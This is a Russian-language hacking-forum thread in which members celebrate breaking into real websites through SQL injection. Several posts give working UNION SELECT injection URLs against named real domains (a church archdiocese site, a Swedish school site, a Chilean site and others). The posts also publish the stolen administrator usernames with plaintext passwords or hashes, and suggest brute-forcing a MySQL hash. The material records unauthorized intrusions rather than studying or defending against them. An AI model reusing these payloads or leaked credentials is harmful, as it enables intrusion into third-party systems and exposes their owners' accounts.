.::AngryHacker.4bb.ru::.

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.

Вы здесь » .::AngryHacker.4bb.ru::. » Флуд » Sql injection

Sql injection

Страница: 1

Сообщений 1 страница 11 из 11

1

  • Автор: AngryHacker
  • Администратор
  • AngryHacker
  • Откуда: я знаю?
  • Зарегистрирован: 2007-11-18
  • Приглашений: 0
  • Сообщений: 12475
  • Уважение: +27
  • Позитив: +12
  • Пол: Мужской
  • Провел на форуме:
    4 дня 15 часов
  • Последний визит:
    2009-08-10 02:18:51

Итак, сегодня я ВСЕ ТАКИ ДОБИЛ первый в моей жизни сайт!!! http://www.free-smile.info/smiles/3/1/i45.gif

Нашел я разбор уязвимого сайта (Каюсь, искал не сам, а взял уже найденый)  тут, но т.к. там нихрена не описывалось пришлось все делать самому.

Итак, жертва:

_http://www.archdiocese.la

Уязвимость закралась в скрипт id, проверить это можно так:

_http://www.archdiocese.la/podc asts/detail.php?id=1'

Ошибка? Отлично!

Нашел кол-во полей, их 18.

_http://www.archdiocese.la/podcasts/detail.php?id=1+uni on+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18/*

А потом с помошью грамотно сформулированного запроса я получил логин\пасс админа http://kolobok.us/smiles/standart/yahoo.gifhttp://kolobok.us/smiles/standart/yahoo.gifhttp://kolobok.us/smiles/standart/yahoo.gif

Вот и он:

_http://www.archdiocese.la/podcasts/detail.php?id=1+u nion+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18+FROM+users/*

Логин:пасс - rimes:hortense

КСТАТИ! Это ровно 50 тема на форуме и ровно 100 сообщение, так что пива будет очень много!!!  ;)

ЗЫ: Да, Артур, плакать можно.  :rolleyes:

0

2

  • Автор: Флудер
  • Новичок
  • Зарегистрирован: 2007-11-20
  • Приглашений: 0
  • Сообщений: 14
  • Уважение: +1
  • Позитив: +1
  • Провел на форуме:
    8 часов 26 минут
  • Последний визит:
    2009-01-25 00:45:01

Поздравляю! :)

0

3

  • Автор: }{@keR
  • Очень сонный и абсолютно ленивый Админ
  • }{@keR
  • Зарегистрирован: 2007-11-18
  • Приглашений: 0
  • Сообщений: 74
  • Уважение: +13
  • Позитив: +9
  • Пол: Мужской
  • Провел на форуме:
    49 минут
  • Последний визит:
    2009-06-15 22:41:56

:O  :O После такого нет смысла жить. Пойду убью себя.  :suicide:  :suicide:

0

4

  • Автор: AngryHacker
  • Администратор
  • AngryHacker
  • Откуда: я знаю?
  • Зарегистрирован: 2007-11-18
  • Приглашений: 0
  • Сообщений: 12475
  • Уважение: +27
  • Позитив: +12
  • Пол: Мужской
  • Провел на форуме:
    4 дня 15 часов
  • Последний визит:
    2009-08-10 02:18:51
}{@keR написал(а):

После такого нет смысла жить. Пойду убью себя.

Не надо! пропадет 3 шестизнака зря ))

Если надо я могу скопипастить или написать статью про SQL inj. Только вот не думаю, что на форуме кто-то заинтересуется...
Только скажите.

0

5

  • Автор: }{@keR
  • Очень сонный и абсолютно ленивый Админ
  • }{@keR
  • Зарегистрирован: 2007-11-18
  • Приглашений: 0
  • Сообщений: 74
  • Уважение: +13
  • Позитив: +9
  • Пол: Мужской
  • Провел на форуме:
    49 минут
  • Последний визит:
    2009-06-15 22:41:56

Хмм... Думаю стоит сделать статейку.

0

6

  • Автор: AngryHacker
  • Администратор
  • AngryHacker
  • Откуда: я знаю?
  • Зарегистрирован: 2007-11-18
  • Приглашений: 0
  • Сообщений: 12475
  • Уважение: +27
  • Позитив: +12
  • Пол: Мужской
  • Провел на форуме:
    4 дня 15 часов
  • Последний визит:
    2009-08-10 02:18:51

Тоже взломано лично мной ;)

_http://www.tayle.com/adv.php?aid=-1+union+sele ct+1,2,concat(user,0x3a,password),4+from+mysql.user/*

root:1ae19294509100c8

пароль в MySql хеше. его можно пробрутить :)

0

7

  • Автор: AngryHacker
  • Администратор
  • AngryHacker
  • Откуда: я знаю?
  • Зарегистрирован: 2007-11-18
  • Приглашений: 0
  • Сообщений: 12475
  • Уважение: +27
  • Позитив: +12
  • Пол: Мужской
  • Провел на форуме:
    4 дня 15 часов
  • Последний визит:
    2009-08-10 02:18:51

Записал видео! по тайле

http://slil.ru/25343052

0

8

  • Автор: AngryHacker
  • Администратор
  • AngryHacker
  • Откуда: я знаю?
  • Зарегистрирован: 2007-11-18
  • Приглашений: 0
  • Сообщений: 12475
  • Уважение: +27
  • Позитив: +12
  • Пол: Мужской
  • Провел на форуме:
    4 дня 15 часов
  • Последний визит:
    2009-08-10 02:18:51

_http://www.dramaterapia.cl/dt/index.php?newsgroup=10000+u nion+select+1,concat(uname,0x3a,passwd),3,4,5,6,7,8,9,10,11,12,13+from+admin/*

admin:670drack

torres:luzdeluna

;)

0

9

  • Автор: }{@keR
  • Очень сонный и абсолютно ленивый Админ
  • }{@keR
  • Зарегистрирован: 2007-11-18
  • Приглашений: 0
  • Сообщений: 74
  • Уважение: +13
  • Позитив: +9
  • Пол: Мужской
  • Провел на форуме:
    49 минут
  • Последний визит:
    2009-06-15 22:41:56

Дожил и я до светлова дня. Я взломал свой первый сайт http://kolobok.us/smiles/standart/yahoo.gifhttp://kolobok.us/smiles/standart/yahoo.gifhttp://kolobok.us/smiles/standart/yahoo.gif

http://www.edu.upplands-bro.se/ubg/index.php?id=-1+u nion+select+1,user_name,user_password,4+f rom+admin/*

Super Admin:7533f4f0929ef2d7f7b507f2112bfcd3

Erik:f80ef83da6197bc1c46a834dd8c26c4f

И многие другие... ;)

0

10

  • Автор: AngryHacker
  • Администратор
  • AngryHacker
  • Откуда: я знаю?
  • Зарегистрирован: 2007-11-18
  • Приглашений: 0
  • Сообщений: 12475
  • Уважение: +27
  • Позитив: +12
  • Пол: Мужской
  • Провел на форуме:
    4 дня 15 часов
  • Последний визит:
    2009-08-10 02:18:51

Молодца!  :yu: Теперь все будет намного интереснее. ))

0

11

  • Автор: romasan93
  • Новичок
  • Зарегистрирован: 2011-08-03
  • Приглашений: 0
  • Сообщений: 1
  • Уважение: +0
  • Позитив: +0
  • Провел на форуме:
    8 минут
  • Последний визит:
    2011-08-03 12:43:17

А как найти кол-во полей?

0

Страница: 1

Вы здесь » .::AngryHacker.4bb.ru::. » Флуд » Sql injection